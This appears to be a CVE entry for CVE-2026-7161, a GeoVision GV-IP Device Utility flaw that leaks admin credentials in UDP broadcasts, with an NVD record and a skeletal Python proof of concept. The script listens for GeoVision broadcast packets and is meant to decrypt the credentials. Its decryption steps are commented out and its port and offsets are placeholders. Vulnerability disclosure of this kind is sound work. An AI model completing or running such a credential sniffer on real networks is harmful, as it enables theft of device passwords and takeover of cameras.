CVE-2026-7161

import socket import struct from Crypto.Cipher import Blowfish import binascii # Conceptual Proof of Concept for CVE-2026-7161 # This script demonstrates how to sniff UDP broadcast packets and decrypt credentials. # Note: The specific packet structure (offsets) and Blowfish implementation details # (mode, padding) would need to be reversed engineered from the specific utility version. def parse_and_decrypt(packet_data): # Hypothetical parsing logic based on the vulnerability description # 1. Extract the symmetric key from the packet (e.g., first X bytes) # 2. Extract the encrypted credentials (e.g., bytes X to Y) # Example offsets (these need to be verified against the real protocol) try: # key = packet_data[key_offset:key_offset+key_length] # ciphertext = packet_data[cipher_offset:cipher_offset+cipher_length] # cipher = Blowfish.new(key, Blowfish.MODE_ECB) # plaintext = cipher.decrypt(ciphertext) # print(f"[+] Decrypted Credentials: {plaintext}") pass except Exception as e: print(f"[-] Decryption failed: {e}") def main(): # Setup UDP socket to listen for broadcast traffic # GeoVision utility typically uses a specific port, replace PORT_NUMBER UDP_PORT = PORT_NUMBER sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(("0.0.0.0", UDP_PORT)) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) print(f"[*] Listening for GeoVision broadcast traffic on port {UDP_PORT}...") while True: data, addr = sock.recvfrom(1024) # Buffer size 1024 print(f"[*] Received {len(data)} bytes from {addr[0]}") parse_and_decrypt(data) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-7161", "sourceIdentifier": "0df08a0e-a200-4957-9bb0-084f562506f9", "published": "2026-05-04T01:16:04.447", "lastModified": "2026-05-05T02:39:53.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An insufficient encryption vulnerability exists in the Device Authentication functionality of GeoVision GV-IP Device Utility 9.0.5. Listening to broadcast packets can lead to credentials leak. An attacker can listen to broadcast messages to trigger this vulnerability.\n\n\nWhen interacting with various Geovision devices on the network, the utility may send privileged commands; in order to do so, the username and password of the device need to be provided. In some instances the command is broadcasted over UDP and the username/password are encrypted using a cryptographic protocol that appears to be derivated from Blowfish. However the symmetric key used for the encryption is also included in the packet, and thus the security of the username/password only relies on the \"obscurity\" of the encryption scheme. An attacker on the same LAN can listen to the broadcast traffic once an admin user interacts with the device, and decrypt the credentials using their own implementation of the algorithm. With this password the attacker would have full control over the device configuration, allowing them to change its ip address or even reset it to factory default."}], "metrics": {"cvssMetricV31": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:H", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "0df08a0e-a200-4957-9bb0-084f562506f9", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-656"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:geovision:gv-ip_device_utility:9.0.5:*:*:*:*:*:*:*", "matchCriteriaId": "B69010CB-82BF-4F0C-83C6-1EDFF720EC3D"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Third Party Advisory"]}, {"url": "https://www.geovision.com.tw/cyber_security.php", "source": "0df08a0e-a200-4957-9bb0-084f562506f9", "tags": ["Vendor Advisory"]}]}}